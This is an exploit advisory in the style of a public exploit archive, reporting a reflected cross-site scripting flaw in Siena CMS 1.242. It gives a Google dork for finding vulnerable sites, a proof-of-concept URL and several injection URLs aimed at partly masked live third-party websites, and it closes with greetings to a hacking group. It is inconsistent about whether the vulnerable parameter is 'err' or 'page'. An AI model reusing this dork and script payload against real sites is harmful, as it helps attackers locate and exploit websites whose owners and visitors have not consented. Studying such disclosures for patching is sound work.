---------------------------------------------------------------- Siena CMS (1.242) <= Cross Site scripting Vulnerabilities ---------------------------------------------------------------- # Exploit Title: Siena CMS (1.242) <= Cross Site scripting Vulnerabilities # Application Name: [Siena CMS] # Date: 30/12/2011 # Author: BHG Security Center # Home: Http://black-hg.org # Software Link: [ http://www.sienacms.com ] # Impact : [ low ] # Dork: inurl:"index.php?page=" $ Version : [1.242] # Tested on: [linux+apache] # CVE : Webapps # Finder(s): - Net.Edit0r (Net.edit0r [at] att [dot] net) # Description: : You can use this vulnerability to take malicious ~ XSS (ha.ckers.org/xss.html) +-----------------------+ | Cross Site scripting | +-----------------------+ The vulnerable code is located in /index.php?err=[XSS] Proof of Concept: ----------------- ~ PoC : http://localhost/index.php?page=[XSS] ~ Demo : http://chelseaXXXXXXXn.com/index.php?page=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E ~ Demo : http://www.siXXXms.com/index.php?page=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E ~ Demo : http://www.chelXXXrgallery.com/index.php?page=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E ~ Demo : http://www.jessicXXXdesire.com/index.php?page=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E [-] Disclosure timeline: [21/12/2011] - Vulnerabilities discovered [24/12/2011] - Others vulnerabilities discovered [27/12/2011] - Issues reported to http://black-hg.org [30/12/2011] - Public disclosure # Greets To : Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ tHe.k!ll3r ~ Mr.XHat ~ Bl4ck.Viper b3hz4d ~ G3n3Rall ~ NoL1m1t ~ __SENATOR__ ~ NetQurd ~ Cyber C0der THANKS TO ALL Iranian HackerZ ./Persian Gulf ===========================================[End]=============================================